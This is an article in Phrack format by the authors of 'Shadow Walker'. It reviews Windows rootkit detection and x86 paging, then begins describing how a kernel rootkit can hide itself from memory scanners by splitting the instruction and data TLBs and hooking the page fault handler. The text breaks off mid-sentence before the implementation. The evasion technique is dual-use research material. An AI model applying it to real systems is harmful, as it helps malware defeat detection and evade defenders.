Raising The Bar For Windows Rootkit Detection

Osiris · Feb 3, 2006

==Phrack Inc.==

Volume 0x0b, Issue 0x3d, Phile #0x08 of 0x14

|=-------------------------=[ Shadow Walker ]=---------------------------=|
|=--------=[ Raising The Bar For Windows Rootkit Detection ]=------------=|
|=-----------------------------------------------------------------------=|
|=---------=[ Sherri Sparks <ssparks at mail.cs.ucf dot edu > ]=---------=|
|=---------=[ Jamie Butler <james.butler at hbgary dot com > ]=---------=|

0 - Introduction & Background On Rootkit Technology
0.1 - Motivations

1 - Rootkit Detection
1.1 - Detecting The Effect Of A Rootkit (Heuristics)
1.2 - Detecting The Rootkit Itself (Signatures)

2 - Memory Architecture Review
2.1 - Virtual Memory - Paging vs. Segmentation
2.2 - Page Tables & PTE's
2.3 - Virtual to Physical Address Translation
2.4 - The Role of the Page Fault Handler
2.5 - The Paging Performance Problem & the TLB

3 - Memory Cloaking Concept
3.1 - Hiding Executable Code
3.2 - Hiding Pure Data
3.3 - Related Work
3.4 - Proof of Concept Implementation
3.4.a - Modified FU Rootkit
3.4.b - Shadow Walker Memory Hook Engine

4 - Known Limitations & Performance Impact

5 - Detection

6 - Conclusion

7 - References

8 - Acknowledgements

--[ 0 - Introduction & Background

Rootkits have historically demonstrated a co-evolutionary adaptation and
response to the development of defensive technologies designed to
apprehend their subversive agenda. If we trace the evolution of rootkit
technology, this pattern is evident. First generation rootkits were
primitive. They simply replaced / modified key system files on the
victim's system. The UNIX login program was a common target and involved
an attacker replacing the original binary with a maliciously enhanced
version that logged user passwords. Because these early rootkit
modifications were limited to system files on disk, they motivated the
development of file system integrity checkers such as Tripwire [1].

In response, rootkit developers moved their modifications off disk to the
memory images of the loaded programs and, again, evaded detection. These
'second' generation rootkits were primarily based upon hooking techniques
that altered the execution path by making memory patches to loaded
applications and some operating system components such as the system call
table. Although much stealthier, such modifications remained detectable by
searching for heuristic abnormalities. For example, it is suspicious for
the system service table to contain pointers that do not point to the
operating system kernel. This is the technique used by VICE [2].

Third generation kernel rootkit techniques like Direct Kernel Object
Manipulation (DKOM), which was implemented in the FU rootkit [3],
capitalize on the weaknesses of current detection software by modifying
dynamically changing kernel data structures for which it is impossible to
establish a static trusted baseline.

----[ 0.1 - Motivations

There are public rootkits which illustrate all of these various techniques,
but even the most sophisticated Windows kernel rootkits, like FU, possess
an inherent flaw. They subvert essentially all of the operating system's
subsystems with one exception: memory management. Kernel rootkits can
control the execution path of kernel code, alter kernel data, and fake
system call return values, but they have not (yet) demonstrated the
capability to 'hook' or fake the contents of memory seen by other running
applications. In other words, public kernel rootkits are sitting ducks for
in-memory signature scans. Only now are security companies beginning to
think of implementing memory signature scans.

Hiding from memory scans is similar to the problem faced by early viruses
attempting to hide on the file system. Virus writers reacted to anti-virus
programs scanning the file system by developing polymorphic and metamorphic
techniques to evade detection. Polymorphism attempts to alter the binary
image of a virus by replacing blocks of code with functionally equivalent
blocks that appear different (i.e. use different opcodes to perform the
same task). Polymorphic code, therefore, alters the superficial appearance
of a block of code, but it does not fundamentally alter a scanner's view of
that region of system memory.

Traditionally, there have been three general approaches to malicious code
detection: misuse detection, which relies upon known code signatures,
anomaly detection, which relies upon heuristics and statistical deviations
from 'normal' behavior, and integrity checking which relies upon comparing
current snapshots of the file system or memory with a known, trusted
baseline. A polymorphic rootkit (or virus) effectively evades signature
based detection of its code body, but falls short in anomaly or integrity
detection schemes because it cannot easily camouflage the changes it makes
to existing binary code in other system components.

Now imagine a rootkit that makes no effort to change its superficial
appearance, yet is capable of fundamentally altering a detector's view of
an arbitrary region of memory. When the detector attempts to read any region
of memory modified by the rootkit, it sees a 'normal', unaltered view of
memory. Only the rootkit sees the true, altered view of memory. Such a
rootkit is clearly capable of compromising all of the primary detection
methodologies to varying degrees. The implications to misuse detection are
obvious. A scanner attempts to read the memory for the loaded rootkit
driver looking for a code signature and the rootkit simply returns a
random, 'fake' view of memory (i.e. which does not include its own code) to
the scanner. There are also implications for integrity validation
approaches to detection. In these cases, the rootkit returns the unaltered
view of memory to all processes other than itself. The integrity checker
sees the unaltered code, finds a matching CRC or hash, and (erroneously)
assumes that all is well. Finally, any anomaly detection methods which
rely upon identifying deviant structural characteristics will be fooled
since they will receive a 'normal' view of the code. An example of this
might be a scanner like VICE which attempts to heuristically identify
inline function hooks by the presence of a direct jump at the beginning of
the function body.

Current rootkits, with the exception of Hacker Defender [4], have made
little or no effort to introduce viral polymorphism techniques. As stated
previously, while a valuable technique, polymorphism is not a comprehensive
solution to the problem for a rootkit because the rootkit cannot easily
camouflage the changes it must make to existing code in order to install
its hooks. Our objective, therefore, is to show proof of concept that the
current architecture permits subversion of memory management such that a
non polymorphic kernel mode rootkit (or virus) is capable of controlling
the view of memory regions seen by the operating system and other processes
with a minimal performance hit. The end result is that it is possible to
hide a 'known' public rootkit driver (for which a code signature exists)
from detection. To this end, we have designed an 'enhanced' version of the
FU rootkit. In section 1, we discuss the basic techniques used to detect a
rootkit. In section 2, we give a background summary of the x86 memory
architecture. Section 3 outlines the concept of memory cloaking and proof
of concept implementation for our enhanced rootkit. Finally, we
conclude with a discussion of its detectability, limitations, future
extensibility, and performance impact. Without further ado, we bid you
welcome to 4th generation rootkit technology.

--[ 1 - Rootkit Detection

Until several months ago, rootkit detection was largely ignored by security
vendors. Many mistakenly classified rootkits in the same category as other
viruses and malware. Because of this, security companies continued to use
the same detection methods, the most prominent one being signature scans on
the file system. This is only partially effective. Once a rootkit is loaded
in memory, it can delete itself on disk, hide its files, or even divert an
attempt to open the rootkit file. In this section, we will examine more
recent advances in rootkit detection.

----[ 1.1 - Detecting The Effect Of A Rootkit (Heuristics)

One method to detect the presence of a rootkit is to detect how it alters
other parameters on the computer system. In this way, the effects of the
rootkit are seen although the actual rootkit that caused the deviation may
not be known. This solution is a more general approach since no signature
for a particular rootkit is necessary. This technique is also looking for
the rootkit in memory and not on the file system.

One effect of a rootkit is that it usually alters the execution path of a
normal program. By inserting itself in the middle of a program's execution,
the rootkit can act as a middle man between the kernel functions the
program relies upon and the program. With this position of power, the
rootkit can alter what the program sees and does. For example, the rootkit
could return a handle to a log file that is different from the one the
program intended to open, or the rootkit could change the destination of
network communication. These rootkit patches or hooks cause extra
instructions to be executed. When a patched function is compared to a
normal function, the difference in the number of instructions executed can
be indicative of a rootkit. This is the technique used by PatchFinder [5].
One of the drawbacks of PatchFinder is that the CPU must be put into single
step mode in order to count instructions. So for every instruction executed
an interrupt is fired and must be handled. This slows the performance of
the system, which may be unacceptable on a production machine. Also, the
actual number of instructions executed can vary even on a clean system.
Another rootkit detection tool called VICE detects the presence of hooks in
applications and in the kernel. VICE analyzes the addresses of the
functions exported by the operating system looking for hooks. The exported
functions are typically the target of rootkits because by filtering certain
APIs rootkits can hide. By finding the hooks themselves, VICE avoids the
problems associated with instruction counting. However, VICE also relies
upon several APIs so it is possible for a rootkit to defeat its hook
detection [6]. Currently the biggest weakness of VICE is that it detects
all hooks, both malicious and benign. Hooking is a legitimate technique used
by many security products.

Another approach to detecting the effects of a rootkit is to identify when
the operating system is lying. The operating system exposes a well-known API in
order for applications to interact with it. When the rootkit alters the
results of a particular API, it is a lie. For example, Windows Explorer may
request the number of files in a directory using several functions in the
Win32 API. If the rootkit changes the number of files that the application
can see, it is a lie. To detect the lie, a rootkit detector needs at least
two ways to obtain the same information. Then, both results can be
compared. RootkitRevealer [7] uses this technique. It calls the highest
level APIs and compares those results with the results of the lowest level
APIs. This method can be bypassed by a rootkit if it also hooks at those
lowest layers. RootkitRevealer also does not address data alterations. The
FU rootkit alters the kernel data structures in order to hide its
processes. RootkitRevealer does not detect this because both the higher and
lower layer APIs return the same altered data set. Blacklight from F-Secure
[8] also tries to detect deviations from the truth. To detect hidden
processes, it relies on an undocumented kernel structure. Just as FU walks
the linked list of processes to hide, Blacklight walks a linked list of
handle tables in the kernel. Every process has a handle table; therefore,
by identifying all the handle tables Blacklight can find a pointer to every
process on the computer. FU has been updated to also unhook the hidden
process from the linked list of handle tables. This arms race will
continue.
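
The "two ways to obtain the same information" idea can be sketched as a
simple set difference. The following is only an illustrative model, not the
method used by RootkitRevealer or Blacklight: the function names and the use
of plain arrays of numeric IDs are assumptions made for the example. One
array stands for the result of a high level API, the other for the result of
a lower level enumeration.

```c
#include <stddef.h>
#include <stdint.h>

/* Returns 1 if id appears in view[0..n-1], 0 otherwise. */
int view_contains(const uint32_t *view, size_t n, uint32_t id)
{
    size_t i;
    for (i = 0; i < n; i++)
        if (view[i] == id)
            return 1;
    return 0;
}

/*
 * Hypothetical cross-view comparison. Every id present in the low level
 * view but absent from the high level view is written to hidden[] (up to
 * cap entries). The return value is the total number of discrepancies.
 */
size_t cross_view_diff(const uint32_t *low, size_t n_low,
                       const uint32_t *high, size_t n_high,
                       uint32_t *hidden, size_t cap)
{
    size_t i, count = 0;
    for (i = 0; i < n_low; i++) {
        if (!view_contains(high, n_high, low[i])) {
            if (count < cap)
                hidden[count] = low[i];
            count++;
        }
    }
    return count;
}
```

Note that the comparison is only as good as the lower view. If both views
are derived from the same altered data, as with FU's modified process list,
the difference is empty and nothing is reported.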

----[ 1.2 - Detecting the Rootkit Itself (Signatures)

Anti-virus companies have shown that scanning file systems for signatures
can be effective; however, it can be subverted. If the attacker camouflages
the binary by using a packing routine, the signature may no longer match
the rootkit. A signature of the rootkit as it will execute in memory is one
way to solve this problem. Some host based intrusion prevention systems
(HIPS) try to prevent the rootkit from loading. However, it is extremely
difficult to block all the ways code can be loaded in the kernel. Recent
papers by Barnaby Jack [9] and Chong [10] have highlighted the threat of
kernel exploits, which will allow arbitrary code to be loaded into memory
and executed.

Although file system scans and loading detection are needed, perhaps the
last layer of detection is scanning memory itself. This provides an added
layer of security if the rootkit has bypassed the previous checks. Memory
signatures are more reliable because the rootkit must unpack or decrypt
itself in order to execute. Not only can scanning memory be used to find a
rootkit, it can be used to verify the integrity of the kernel itself since
it has a known signature. Scanning kernel memory is also much faster than
scanning everything on disk. Arbaugh et al. [11] have taken this technique
to the next level by implementing the scanner on a separate card with its
own CPU.
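
At its simplest, a memory signature scan is a byte pattern search over a
region of memory. The sketch below is a naive illustration of that idea
only. The function name is hypothetical, and real scanners use far more
elaborate matching. The point to notice is that the scanner obtains every
byte through an ordinary data read of the region.

```c
#include <stddef.h>
#include <string.h>

/*
 * Naive signature scan (illustrative only). Returns a pointer to the
 * first occurrence of sig within mem, or NULL if the signature is not
 * found. Every byte examined is fetched with a normal data read.
 */
const unsigned char *scan_for_signature(const unsigned char *mem,
                                        size_t mem_len,
                                        const unsigned char *sig,
                                        size_t sig_len)
{
    size_t i;

    if (sig_len == 0 || sig_len > mem_len)
        return NULL;

    for (i = 0; i + sig_len <= mem_len; i++)
        if (memcmp(mem + i, sig, sig_len) == 0)
            return mem + i;

    return NULL;
}
```

Because the scan sees only what a data read returns, its result depends
entirely on the view of memory it is given.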

The next section will explain the memory architecture on Intel x86.

--[ 2 - Memory Architecture Review

In early computing history, programmers were constrained by the amount of
physical memory contained in a system. If a program was too large to fit
into memory, it was the programmer's responsibility to divide the program
into pieces that could be loaded and unloaded on demand. These pieces were
called overlays. Forcing this type of memory management upon user level
programmers increased code complexity and programming errors while reducing
efficiency. Virtual memory was invented to relieve programmers of these
burdens.

----[ 2.1 - Virtual Memory - Paging vs. Segmentation

Virtual memory is based upon the separation of the virtual and physical
address spaces. The size of the virtual address space is primarily a
function of the width of the address bus whereas the size of the physical
address space is dependent upon the quantity of RAM installed in the
system. Thus, a system possessing a 32 bit bus is capable of addressing
2^32 (or ~4 GB) physical bytes of contiguous memory. It may, however, not
have anywhere near that quantity of RAM installed. If this is the case,
then the virtual address space will be larger than the physical address
space. Virtual memory divides both the virtual and physical address spaces
into blocks. If these blocks are all the same fixed size, the system
is said to use a paging memory model. If the blocks are of varying sizes,
it is considered to be a segmentation model. The x86 architecture is in fact
a hybrid, utilizing both segmentation and paging; however, this article
focuses primarily upon exploitation of its paging mechanism.

Under a paging model, blocks of virtual memory are referred to as pages and
blocks of physical memory are referred to as frames. Each virtual page maps
to a designated physical frame. This is what enables the virtual address
space seen by programs to be larger than the amount of physically
addressable memory (i.e. there may be more pages than physical frames). It
also means that virtually contiguous pages do not have to be physically
contiguous. These points are illustrated by Figure 1.

VIRTUAL ADDRESS PHYSICAL ADDRESS
SPACE SPACE
/-------------\ /-------------\
| | | |
| PAGE 01 |---\ /----------->>>| FRAME 01 |
| | | | | |
--------------- | | ---------------
| | | | | |
| PAGE 02 |------------------->>>| FRAME 02 |
| | | | | |
--------------- | | ---------------
| | | | | |
| PAGE 03 | \---|----------->>>| FRAME 03 |
| | | | |
--------------- | \-------------/
| | |
| PAGE 04 | |
| | |
|-------------| |
| | |
| PAGE 05 |-------/
| |
\-------------/

[ Figure 1 - Virtual To Physical Memory Mapping (Paging) ]
[ ]
[ NOTE: 1. Virtual & physical address spaces are divided into ]
[ fixed size blocks. 2. The virtual address space may be larger ]
[ than the physical address space. 3. Virtually contiguous ]
[ blocks do not have to be mapped to physically contiguous ]
[ frames. ]

----[ 2.2 - Page Tables & PTE's

The mapping information that connects a virtual address with its physical
frame is stored in page tables in structures known as page table entries
(PTE's). PTE's also store status information. Status bits may indicate, for
example, whether or not a page is valid (physically present in memory
versus stored on disk), if it is writable, or if it is a user / supervisor
page. Figure 2 shows the format for an x86 PTE.

Valid          <----------------------------------------------------------\
Read/Write     <-----------------------------------------------------\    |
Privilege      <------------------------------------------------\    |    |
Write Through  <-------------------------------------------\    |    |    |
Cache Disabled <--------------------------------------\    |    |    |    |
Accessed       <---------------------------------\    |    |    |    |    |
Dirty          <----------------------------\    |    |    |    |    |    |
Reserved       <-----------------------\    |    |    |    |    |    |    |
Global         <------------------\    |    |    |    |    |    |    |    |
Reserved       <-------------\    |    |    |    |    |    |    |    |    |
Reserved       <--------\    |    |    |    |    |    |    |    |    |    |
Reserved       <---\    |    |    |    |    |    |    |    |    |    |    |
                   |    |    |    |    |    |    |    |    |    |    |    |
+----------------+----+----+----+----+----+----+----+----+----+----+----+----+
|                |    |    |    |    |    |    |    |    |    | U  | R  |    |
|  PAGE FRAME #  | U  | P  | Cw | Gl | L  | D  | A  | Cd | Wt | /  | /  | V  |
|                |    |    |    |    |    |    |    |    |    | S  | W  |    |
+----------------+----+----+----+----+----+----+----+----+----+----+----+----+

[ Figure 2 - x86 PTE FORMAT (4 KBYTE PAGE) ]
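
For readers who prefer masks to diagrams, the hardware-defined status bits
of Figure 2 can be written as C constants. This is a minimal sketch assuming
the standard 32-bit, 4 KB page layout (no PAE). The macro and helper names
are made up for this example and do not come from any Windows header.

```c
#include <stdint.h>

/* Assumed names for the low status bits of a 32-bit x86 PTE (4 KB page). */
#define PTE_VALID          0x001u  /* bit 0: page is present in memory  */
#define PTE_WRITABLE       0x002u  /* bit 1: read / write               */
#define PTE_USER           0x004u  /* bit 2: user (1) or supervisor (0) */
#define PTE_WRITE_THROUGH  0x008u  /* bit 3 */
#define PTE_CACHE_DISABLED 0x010u  /* bit 4 */
#define PTE_ACCESSED       0x020u  /* bit 5 */
#define PTE_DIRTY          0x040u  /* bit 6 */
#define PTE_GLOBAL         0x100u  /* bit 8 */

/* Non-zero if the valid (present) bit is set. */
int pte_is_valid(uint32_t pte)
{
    return (pte & PTE_VALID) != 0;
}

/* The page frame number lives in the upper 20 bits (bits 12 - 31). */
uint32_t pte_frame_number(uint32_t pte)
{
    return pte >> 12;
}

/* Clears only the valid bit; the frame number and other bits survive. */
uint32_t pte_mark_not_present(uint32_t pte)
{
    return pte & ~PTE_VALID;
}
```

For example, the PTE value 0x12345067 is valid, writable, and user
accessible, and refers to page frame 0x12345.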

----[ 2.3 - Virtual To Physical Address Translation

Virtual addresses encode the information necessary to find their PTE's in
the page table. They are divided into 2 basic parts: the virtual page
number and the byte index. The virtual page number provides the index into
the page table while the byte index provides an offset into the physical
frame. When a memory reference occurs, the PTE for the page is looked up in
the page table by adding the page table base address to the virtual page
number * PTE entry size. The base address of the page in physical memory is
then extracted from the PTE and combined with the byte offset to define the
physical memory address that is sent to the memory unit. If the virtual
address space is particularly large and the page size relatively small, it
stands to reason that it will require a large page table to hold all of the
mapping information. And as the page table must remain resident in main
memory, a large table can be costly. One solution to this dilemma is to use
a multi-level paging scheme. A two-level paging scheme, in effect, pages
the page table. It further subdivides the virtual page number into a page
directory and a page table index. The page directory is simply a table of
pointers to page tables. This two level paging scheme is the one supported
by the x86. Figure 3 illustrates how the virtual address is divided up to
index the page directory and page tables and Figure 4 illustrates the
process of address translation.

+---------------------------------------+
| 31                                 12 |                 0
| +----------------+ +----------------+ | +---------------+
| | PAGE DIRECTORY | |   PAGE TABLE   | | |  BYTE INDEX   |
| |     INDEX      | |     INDEX      | | |               |
| +----------------+ +----------------+ | +---------------+
|      10 bits            10 bits       |      12 bits
|                                       |
|          VIRTUAL PAGE NUMBER          |
+---------------------------------------+

[ Figure 3 - x86 Address & Page Table Indexing Scheme ]
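
The 10 / 10 / 12 bit split of Figure 3 amounts to two shifts and two masks.
The following sketch shows the decomposition for a 32-bit address. The
struct and function names are hypothetical and chosen for illustration.

```c
#include <stdint.h>

/* The three fields of a 32-bit x86 virtual address (4 KB pages). */
typedef struct {
    uint32_t dir_index;    /* bits 31 - 22: page directory index */
    uint32_t table_index;  /* bits 21 - 12: page table index     */
    uint32_t byte_index;   /* bits 11 - 0 : offset into the page */
} va_parts;

va_parts split_virtual_address(uint32_t va)
{
    va_parts p;
    p.dir_index   = va >> 22;
    p.table_index = (va >> 12) & 0x3FFu;
    p.byte_index  = va & 0xFFFu;
    return p;
}
```

For the address 0xC0300ABC this yields a page directory index of 0x300, a
page table index of 0x300, and a byte index of 0xABC.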

+--------+
/-|KPROCESS|
| +--------+
| Virtual Address
| +------------------------------------------+
| | Page Directory | Page Table | Byte Index |
| | Index | Index | |
| +-+-------------------+-------------+------+
| | +---+ | |
| | |CR3| Physical | |
| | +---+ Address Of | |
| | Page Dir | |
| | | \------ -\
| | | |
| | Page Directory | Page Table | Physical Memory
\---|->+------------+ | /-->+------------+ \---->+------------+
| | | | | | | | |
| | | | | | | | |
| | | | | | | |------------|
| | | | | | | | |
| |------------| | | | | | Page |
\->| PDN |---|-/ | | | Frame |
|------------| | | | /----> |
| | | | | | |------------|
| | | | | | | |
| | | | | | | |
| | | | | | | |
| | | |------------| | | |
| | \---->| PFN -------/ | |
| | |------------| | |
+------------+ +------------+ +------------+
(1 per process) (512 per process)

[ Figure 4 - x86 Address Translation ]

A memory access under a 2 level paging scheme potentially involves the
following sequence of steps.

1. Lookup of page directory entry (PDE).
Page Directory Entry = Page Directory Base Address + sizeof(PDE) * Page
Directory Index (extracted from virtual address that caused the memory
access)
NOTE: Windows maps the page directory to virtual address 0xC0300000.
Base addresses for page directories are also located in KPROCESS blocks
and the register cr3 contains the physical address of the current
page directory.

2. Lookup of page table entry.
Page Table Entry = Page Table Base Address + sizeof(PTE) * Page Table
Index (extracted from virtual address that caused the memory access).
NOTE: Windows maps the page tables to virtual address 0xC0000000.
The base physical address for the page table is also stored in the page
directory entry.

3. Lookup of physical address.
Physical Address = Frame Base Address (from PTE) + Byte Index
NOTE: PTEs hold the physical address for the physical frame in their
upper 20 bits. This is combined with the byte index (offset into the
frame) to form the complete physical address.

For those who prefer code to explanation, the following two routines show
how this translation occurs. The first routine, GetPteAddress, performs
steps 1 and 2 described above. It returns a pointer to the page table entry
for a given virtual address. The second routine extracts the physical frame
to which the page is mapped from that entry. It returns the page frame
number, which is the base physical address of the frame shifted right by 12
bits.

#define PROCESS_PAGE_DIR_BASE 0xC0300000
#define PROCESS_PAGE_TABLE_BASE 0xC0000000
typedef unsigned long* PPTE;

/**************************************************************************
* GetPteAddress - Returns a pointer to the page table entry corresponding
*                 to a given memory address.
*
* Parameters:
*    PVOID VirtualAddress - Address you wish to acquire a pointer to the
*                           page table entry for.
*
* Return - Pointer to the page table entry for VirtualAddress. For a large
*          page there is no page table, so a pointer to the page directory
*          entry is returned instead.
*
* NOTE: As listed, the routine performs no presence checks and returns no
*       error codes. It assumes the page directory entry for
*       VirtualAddress is valid.
**************************************************************************/
PPTE GetPteAddress( PVOID VirtualAddress )
{
    PPTE pPTE = 0;

    __asm
    {
        cli                         //disable interrupts
        pushad
        mov esi, PROCESS_PAGE_DIR_BASE
        mov edx, VirtualAddress
        mov eax, edx
        shr eax, 22                 //page directory index (upper 10 bits)
        lea eax, [esi + eax*4]      //pointer to page directory entry
        test dword ptr [eax], 0x80  //is it a large page?
        jnz Is_Large_Page           //it's a large page
        mov esi, PROCESS_PAGE_TABLE_BASE
        shr edx, 12                 //virtual page number (upper 20 bits)
        lea eax, [esi + edx*4]      //pointer to page table entry (PTE)
        mov pPTE, eax
        jmp Done

        //NOTE: There is not a page table for large pages because
        //the phys frames are contained in the page directory.
    Is_Large_Page:
        mov pPTE, eax

    Done:
        popad
        sti                         //reenable interrupts
    }//end asm

    return pPTE;

}//end GetPteAddress

/**************************************************************************
* GetPhysicalFrameAddress - Gets the physical page frame number of the
*                           frame where the page is mapped. This
*                           corresponds to bits 12 - 31 in the page table
*                           entry.
*
* Parameters -
*    PPTE pPte - Pointer to the PTE that you wish to retrieve the
*                physical frame from.
*
* Return - The page frame number, i.e. the base physical address of the
*          page shifted right by 12 bits.
**************************************************************************/
ULONG GetPhysicalFrameAddress( PPTE pPte )
{
    ULONG Frame = 0;

    __asm
    {
        cli
        pushad
        mov eax, pPte
        mov ecx, [eax]          //read the PTE contents
        shr ecx, 12             //physical page frame consists of the
                                //upper 20 bits
        mov Frame, ecx
        popad
        sti
    }//end asm

    return Frame;

}//end GetPhysicalFrameAddress
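
The address arithmetic performed by the inline assembly can also be
expressed in portable C, which makes it easy to check by hand. This is
only a sketch of the computation, assuming the non-PAE layout and the two
base addresses defined above. It computes where the entries live but does
not dereference anything, so it can be compiled and run in user mode. The
function names are hypothetical.

```c
#include <stdint.h>

/* Same values as PROCESS_PAGE_DIR_BASE and PROCESS_PAGE_TABLE_BASE. */
#define PAGE_DIR_BASE   0xC0300000u
#define PAGE_TABLE_BASE 0xC0000000u

/* Step 1: virtual address of the PDE that covers va (4 bytes per PDE). */
uint32_t pde_virtual_address(uint32_t va)
{
    return PAGE_DIR_BASE + (va >> 22) * 4u;
}

/* Step 2: virtual address of the PTE that maps va (4 bytes per PTE). */
uint32_t pte_virtual_address(uint32_t va)
{
    return PAGE_TABLE_BASE + (va >> 12) * 4u;
}

/* Step 3: frame base from the PTE's upper 20 bits plus the byte index. */
uint32_t physical_address(uint32_t pte, uint32_t va)
{
    return (pte & 0xFFFFF000u) | (va & 0xFFFu);
}
```

For the virtual address 0x80001234, the PDE is found at 0xC0300800 and the
PTE at 0xC0200004. If that PTE held the value 0x00ABC063, the resulting
physical address would be 0x00ABC234.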

----[ 2.4 - The Role Of The Page Fault Handler

Since many processes only use a small portion of their virtual address
space, only the used portions are mapped to physical frames. Also, because
physical memory may be smaller than the virtual address space, the OS may
move less recently used pages to disk (the pagefile) to satisfy current
memory demands. Frame allocation is handled by the operating system. If a
process is larger than the available quantity of physical memory, or the
operating system runs out of free physical frames, some of the currently
allocated frames must be swapped to disk to make room. These swapped out
pages are stored in the page file. The information about whether or not a
page is resident in main memory is stored in the page table entry. When a
memory access occurs, if the page is not present in main memory a page
fault is generated. It is the job of the page fault handler to issue the
I/O requests to swap out a less recently used page if all of the available
physical frames are full and then to bring in the requested page from the
pagefile. When virtual memory is enabled, every memory access must be
looked up in the page table to determine which physical frame it maps to
and whether or not it is present in main memory. This incurs a substantial
performance overhead, especially when the architecture is based upon a
multi-level page table scheme like the Intel Pentium. The memory access
page fault path can be summarized as follows.

1. Lookup in the page directory to determine if the page table for the
address is present in main memory.
2. If not, an I/O request is issued to bring in the page table from disk.
3. Lookup in the page table to determine if the requested page is present
in main memory.
4. If not, an I/O request is issued to bring in the page from disk.
5. Lookup the requested byte (offset) in the page.

Therefore every memory access, in the best case, actually requires 3 memory
accesses: 1 to access the page directory, 1 to access the page table, and
1 to get the data at the correct offset. In the worst case, it may require
an additional 2 disk I/Os (if the pages are swapped out to disk). Thus,
virtual memory incurs a steep performance hit.

----[ 2.5 - The Paging Performance Problem & The TLB

The translation lookaside buffer (TLB) was introduced to help mitigate this
problem. Basically, the TLB is a hardware cache which holds frequently used
virtual to physical mappings. Because the TLB is implemented using
extremely fast associative memory, it can be searched for a translation
much faster than it would take to look that translation up in the page
tables. On a memory access, the TLB is first searched for a valid
translation. If the translation is found, it is termed a TLB hit.
Otherwise, it is a miss. A TLB hit, therefore, bypasses the slower page
table lookup. Modern TLB's have an extremely high hit rate and
therefore seldom incur the miss penalty of looking up the translation in
the page table.
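
The hit / miss behavior can be illustrated with a toy software model. The
sketch below is a deliberate simplification: it assumes a tiny direct-mapped
TLB (real TLBs are associative hardware structures), and walk_page_tables is
a hypothetical stand-in for the slow two-level lookup that simply invents a
frame number. All names are made up for the example.

```c
#include <stdint.h>

#define TLB_ENTRIES 16u

typedef struct {
    int      valid;
    uint32_t vpn;     /* virtual page number  */
    uint32_t frame;   /* physical page frame  */
} tlb_entry;

typedef struct {
    tlb_entry entry[TLB_ENTRIES];
    unsigned  hits;
    unsigned  misses;
} tlb_model;

/* Hypothetical stand-in for the page directory / page table walk. */
uint32_t walk_page_tables(uint32_t vpn)
{
    return vpn + 0x100u;   /* arbitrary made-up mapping */
}

void tlb_init(tlb_model *t)
{
    unsigned i;
    for (i = 0; i < TLB_ENTRIES; i++)
        t->entry[i].valid = 0;
    t->hits = 0;
    t->misses = 0;
}

/* Translates va, consulting the cached mapping before the page tables. */
uint32_t tlb_translate(tlb_model *t, uint32_t va)
{
    uint32_t   vpn  = va >> 12;
    tlb_entry *slot = &t->entry[vpn % TLB_ENTRIES];

    if (slot->valid && slot->vpn == vpn) {
        t->hits++;                           /* hit: no table walk */
    } else {
        t->misses++;                         /* miss: walk and cache */
        slot->valid = 1;
        slot->vpn   = vpn;
        slot->frame = walk_page_tables(vpn);
    }
    return (slot->frame << 12) | (va & 0xFFFu);
}
```

In this model the first access to a page costs a table walk, and every
later access to the same page is served from the cached entry until that
entry is replaced.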

--[ 3 - Memory Cloaking Concept

One goal of an advanced rootkit is to hide its changes to executable code
(i.e. the placement of an inline patch, for example). Obviously, it may
also wish to hide its own code from view. Code, like data, sits in memory
and we may define the basic forms of memory access as:

- EXECUTE
- READ
- WRITE

Technically speaking, we know that each virtual page maps to a physical
page frame defined by a certain number of bits in the page table entry.
What if we could filter memory accesses such that EXECUTE accesses mapped
to a different physical frame than READ / WRITE accesses? From a rootkit's
perspective, this would be highly advantageous. Consider the case of an
inline hook. The modified code would run normally, but any attempts to read
(i.e. detect) changes to the code would be diverted to a 'virgin' physical
frame that contained a view of the original, unaltered code. Similarly, a
rootkit driver might hide itself by diverting READ accesses within its
memory range off to a page containing random garbage or to a page
containing a view of code from another 'innocent' driver. This would imply
that it is possible to spoof both signature scanners and integrity
monitors. Indeed, an architectural feature of the Pentium architecture
makes it possible for a rootkit to perform this little trick with a minimal
impact on overall system performance. We describe the details in the next
section.

----[ 3.1 - Hiding Executable Code

Ironically, the general methodology we are about to discuss is an
offensive extension of an existing stack overflow protection scheme known
as PaX. We briefly discuss the PaX implementation in 3.3 under related
work.

In order to hide executable code, there are at least 3 underlying issues
which must be addressed:

1. We need a way to filter execute and read / write accesses.
2. We need a way to "fake" the read / write memory accesses
when we detect them.
3. We need to ensure that performance is not adversely affected.

The first issue concerns how to filter execute accesses from read / write
accesses. When virtual memory is enabled, memory access restrictions are
enforced by setting bits in the page table entry which specify whether a
given page is read-only or read-write. Under the IA-32 architecture,
however, all pages are executable. As such, there is no official way to
filter execute accesses from read / write accesses and thus enforce the
execute-only / diverted read-write semantics necessary for this scheme
to work. We can, however, trap and filter memory accesses by marking their
PTE's non present and hooking the page fault handler. In the page fault
handler we have access to the saved instruction pointer and the faulting
address. If the instruction pointer equals the faulting address, then it is
an execute access. Otherwise, it is a read / write. As the OS uses the
present bit in memory management, we also need to differentiate between
page faults due to our memory hook and normal page faults. The simplest
way is to require that all hooked pages either reside in non paged memory
or be explicitly locked down via an API like MmProbeAndLockPages.
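
The filtering test described above reduces to a single comparison. The
following is a minimal sketch of that check in isolation. The type and
function names are hypothetical, and the two arguments stand for the saved
instruction pointer and the faulting address that are available inside the
page fault handler.

```c
#include <stdint.h>

typedef enum {
    ACCESS_EXECUTE,     /* instruction fetch from the hooked page */
    ACCESS_READ_WRITE   /* data read or write to the hooked page  */
} access_type;

/*
 * If the fault occurred while fetching the instruction at saved_eip,
 * the faulting address equals saved_eip and the access is an execute.
 * Any other faulting address is treated as a read / write.
 */
access_type classify_access(uint32_t saved_eip, uint32_t faulting_address)
{
    return (saved_eip == faulting_address) ? ACCESS_EXECUTE
                                           : ACCESS_READ_WRITE;
}
```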

The next issue concerns how to "fake" the EXECUTE and READ / WRITE accesses
when we detect them (and do so with a minimal performance hit). In this
case, the Pentium TLB architecture comes to the rescue. The Pentium
possesses a split TLB with one TLB for instructions and the other for data.
As mentioned previously, the TLB caches the virtual to physical page frame
mappings when virtual memory is enabled. Normally, the ITLB and DTLB are
synchronized and hold the same physical mapping for a given page. Though
the TLB is primarily hardware controlled, there are several software
mechanisms for manipulating it.

- Reloading cr3 causes all TLB entries except global entries to be
flushed. This typically occurs on a context switch.
- The invlpg instruction causes a specific TLB entry to be flushed.
- Executing a data access instruction causes the DTLB to be loaded with
the mapping for the data page that was accessed.
- Executing a call causes the ITLB to be loaded with the mapping for the
page containing the code executed in response to the call.

We can filter execute accesses from read / write accesses and fake them by
desynchronizing the TLB's such that the ITLB holds a different virtual to
physical mapping than the DTLB. This process is performed as follows:

First, a new page fault handler is installed to handle the cloaked page
accesses. Then the page-to-be-hooked is marked not present and its
